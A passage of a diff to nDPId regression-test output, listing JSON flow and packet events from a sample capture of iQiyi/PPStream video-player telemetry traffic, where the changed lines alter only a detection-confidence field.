00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7580000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1467353139627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":573,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":573,"pkt_l4_len":539,"thread_ts_msec":1467353139627,"pkt":"TF4M6gNlABxCjnAxCABFAAIvA51AAIAG6DPAqHMIymwO28UlAFD7uSUWcC90rlAYAQQTNwAAR0VUIC9jb3JlP3Q9NSZhPTImcmE9MSZwZj0yMDEmcD0xMSZwMT0xMTQmcDI9MzAwMCZzZGt0cD0xJmMxPTMxJnI9NDc5NTMxMDAwJmFpZD0xODA5MzIzMDEmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9V2luZG93cyUyMDcmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMzkmaXNsb2NhbD0wJmFzPTAzMTFjNWEwZDU1OTYwNjNkYjU5NDRiZDc2YjZjYmZmJnZlPWIxZjkwZjhkYTZmZTAyNThkMTM2MTZhODA3MGNiOTk3JnBlPSZ2ZnJtPSZjaGw9JmhjZG52PTEwLjAuMC4yOTMmdHBjZD0wJmlzZHJtPTEmaHQ9MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7580000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7580000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7580000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1467353139662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":424,"pkt_l4_len":390,"thread_ts_msec":1467353139662,"pkt":"TF4M6gNlABxCjnAxCABFAAGaA59AAIAG6LXAqHMIymwO7MUmAFBtzkRVA7NFyFAYAQQzoQAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmYT0zNCZjdD1vbmNsaWNrJnR5cGU9cGMmYXM9JmNsdD1wY19wbGF5X3BsYXllcl9jbGljayZtdj01LjIuMTUuMjI0MCZwdT0mcm49MEZFMTcyRUM0NEM0NEI4NkFFRURFNTRBQTAwNTQxQzQ1NzQwNiZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9Mi4wLjEwMi4zMDE0NyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7580000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7580000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1467353139771,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353139771,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0y0pAADMGbvDKbA7swKhzCABQxSYDs0XIbc5Fx1AYAB\/3XQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1467353139779,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139779,"pkt":"ABxCjnAxTF4M6gNlCABFAAC58h9AADMGSCfKbA7bwKhzCABQxSVwL3Su+7knHVAYADbM\/QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7580000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1467353139819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":952,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":952,"pkt_l4_len":918,"thread_ts_msec":1467353139819,"pkt":"TF4M6gNlABxCjnAxCABFAAOqA7FAAIAG5pPAqHMIymwO7MUnAFCB65R9kZemalAYQTdERQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9MXx8NzEwMDAwMDF8fDUwMDAwMDA4NTg4NzR8fDUwMDAwMDA5Mjc1NTh8fHJvbGwmYXM9JmF2PTQuMTAuMDA0JmI9MTgwOTMyMzAxJmM9MzEmY3Q9JmQ9MjE3NSZkaT0mZHA9JmU9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPSZvaT0mcD10JnBwPSZyYz0tMSZyZD05MiZyaT0mcz0xNDY3MzUzMTM4MDQzJnNoPSZzcT0mc3c9JnQ9cyZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01302{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7580000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01302{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7580000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1467353139866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139866,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5KWZAADMGENDKbA7swKhzCABQxSeRl6ZqgeuX\/1AYACHEyQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7580000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1467353140628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1100,"pkt_l4_len":1066,"thread_ts_msec":1467353140628,"pkt":"TF4M6gNlABxCjnAxCABFAAQ+A+YAAIAGJdrAqHMIymwO3cUqAFDSWIZQbAIVvVAYKACmwAAAR0VUIC9iP2MxPTYmczE9MSZtYWNpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZjaGFubmVsaWQ9MDAwJm51PSZlPTEzNTI1Mjgmc2U9MTI1MzgxMSZyPTUwMDQ5NDYwMCZhZHVpZD1kMDdkZmQzMGYwZWU0ZTQ4YmJjYWYxMjA4Yzc1ODQ3MSZjdG09MTM3NTIxMSZwbGF5c291cmNlPTAwMTAwNDAwMCZ2aWQ9NTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEmYWxidW1pZD01MDA0OTQ2MDAmcmE9MiZ0ZD0yMjY1MiZzdWNjZXNzaW9uPTQmdHlwZT0xJnZmcm09My0wMDEwMDQwMDAtY19jb3JnaS0wJmJ1Y2tldD1jX2NvcmdpX21haW4mcmF0cD0xJnBsYXltb2RlPTEmaHU9LTEmaHQ9MCZhcD0wJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZ2ZT0xMzUyNTI4JnBmPTIwMSZwPTExJnAxPTExNCZwMj0xMDExJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9JnY9Mi4wLjEwMi4zMDE0NyZkZT1hMGVlNzdhNTYzODg5N2JlYmZkODU1NWIzMjcwYmVmNiZtdj01LjIuMTUuMjI0MCZrdj0xMC4wLjAuMjkzJnNvdXJjZTE9bWluaXBsYXllciZzb3VyY2UyPW1pbmlwbGF5ZXImc291cmNlMz0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUlZTUlOTklYTgmc291cmNlND0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUmcGxheV9zb3VyY2U9MSZvcHQ9MCZjbHQ9aG9tZWRsJnNjZW5lPTEmcm49MDAwMDAwMDE0NjczNTMxNDAgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMDsgQ0lCQTsgQWxleGEgVG9vbGJhcjsgWnVuZSA0LjcpDQpIb3N0OiBtc2cuaXFpeWkuY29tDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiB0YnZlcj1hbHhpLTkuMzk7IGFpZD1kbWVrYzFhUEMzMDA4cA0KDQo="} -01641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7580000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}} +01641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7580000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1467353140655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":941,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":941,"pkt_l4_len":907,"thread_ts_msec":1467353140655,"pkt":"TF4M6gNlABxCjnAxCABFAAOfA+lAAIAG5mbAqHMIymwO7MUrAFDgGmOz15qFMlAYQTe3tgAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjoxfDImYXY9NC4xMC4wMDQmYj0yMDQwNzY3MDEmYz02JmN0PTUwMDAwMDA5MjY3OTUmZD0xNTgmZGk9JmRwPTcxMDAwMDAxJmU9NTEyYWI3N2RlN2Y2N2Q0OWYyNGQzNTExNzc4MjIwZDAmZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPTUwMDAwMDA4NTYzNDQmb2k9JnA9YSZwcD0mcmM9JnJkPSZyaT0mcz0xNDY3MzUzMTM5MDU3JnNoPSZzcT0mc3c9JnQ9c3AmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NTAwNDk0NjAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtl